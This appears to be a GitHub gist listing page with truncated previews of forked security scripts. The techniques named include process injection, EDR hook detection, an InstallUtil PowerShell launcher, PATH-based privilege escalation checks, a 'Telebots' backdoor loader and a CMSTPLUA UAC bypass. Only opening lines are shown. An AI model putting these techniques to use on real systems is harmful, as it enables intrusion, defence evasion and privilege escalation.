superuser5
superuser5
/ CreateRemoteThreadDInvoke.cs
Created
December 31, 2020 04:39
— forked from Flangvik/CreateRemoteThreadDInvoke.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace InjectionTest | |
| { | |
| public class DELEGATES | |
| { |
superuser5
/ AzureCLICheatSheet.ps1
Created
December 31, 2020 04:38
— forked from Flangvik/AzureCLICheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #List all resources | |
| az resource list | convertfrom-json | foreach-object { $_ | Select-Object type, name, resourceGroup, id} | |
| #List details for all VM's | |
| az vm lis | |
| #Run PowerShell command on a VM | |
| az vm run-command invoke --command-id RunPowerShellScript --name MyVm --resource-group MyResourceGroup --scripts 'whoami' | |
| #Run PowerShell command on ALL VM's |
superuser5
/ Get-CSharp.ps1
Created
December 10, 2020 01:37
— forked from mubix/Get-CSharp.ps1
Powershell Get-CSharp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-CSharpProcess { | |
| $proclist = Get-Process | |
| foreach($proc in $proclist) { | |
| foreach($mod in $proc.Modules) | |
| { | |
| if($mod.ModuleName -imatch "mscoree") | |
| { | |
| Write-Output(".NET Found in:`t" + $proc.Name) | |
| } | |
| } |
superuser5
/ hookdetector.vba
Created
December 10, 2020 01:28
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
superuser5
/ coalfire-audit-script.sh
Created
September 4, 2020 07:00
— forked from CobyR/coalfire-audit-script.sh
coalfire audit script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| #set -x | |
| #set -v | |
| # | |
| # This was rewritten in /bin/sh since bash is not readily available | |
| # everywhere. /bin/sh is available on all *NIX systems. | |
| # | |
| ##################################################################### | |
| # PCI data gathering script for Coalfire Systems, Inc. |
superuser5
/ lambda-basic-auth.js
Created
June 20, 2020 06:06
— forked from lmakarov/lambda-basic-auth.js
Basic HTTP Authentication for CloudFront with Lambda@Edge
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| exports.handler = (event, context, callback) => { | |
| // Get request and request headers | |
| const request = event.Records[0].cf.request; | |
| const headers = request.headers; | |
| // Configure authentication | |
| const authUser = 'user'; | |
| const authPass = 'pass'; |
superuser5
/ InstallUtil-PowerShell.cs
Created
May 12, 2020 05:33
— forked from Meatballs1/InstallUtil-PowerShell.cs
InstallUtil.exe PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
superuser5
/ acltest.ps1
Created
April 9, 2020 21:38
— forked from wdormann/acltest.ps1
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
| Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
| Break | |
| } | |
| $outfile = "acltestfile" | |
| set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
| Foreach ($path in $paths) { | |
| # This prints a table of ACLs | |
| # get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
superuser5
/ Loader.py
Created
January 21, 2020 20:31
— forked from Spacecow99/Loader.py
Telebots' Python Telebot Backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| from subprocess import Popen, PIPE | |
| from os import environ, path, system, sep, listdir, remove | |
| from threading import Thread | |
| from time import sleep | |
| from random import sample, getrandbits, randrange | |
| from string import ascii_letters, digits | |
| from platform import platform | |
| import json | |
| import ssl |
superuser5
/ akagi_41.c
Created
June 4, 2019 02:41
— forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface ICMLuaUtil ICMLuaUtil; | |
| typedef struct ICMLuaUtilVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in ICMLuaUtil * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |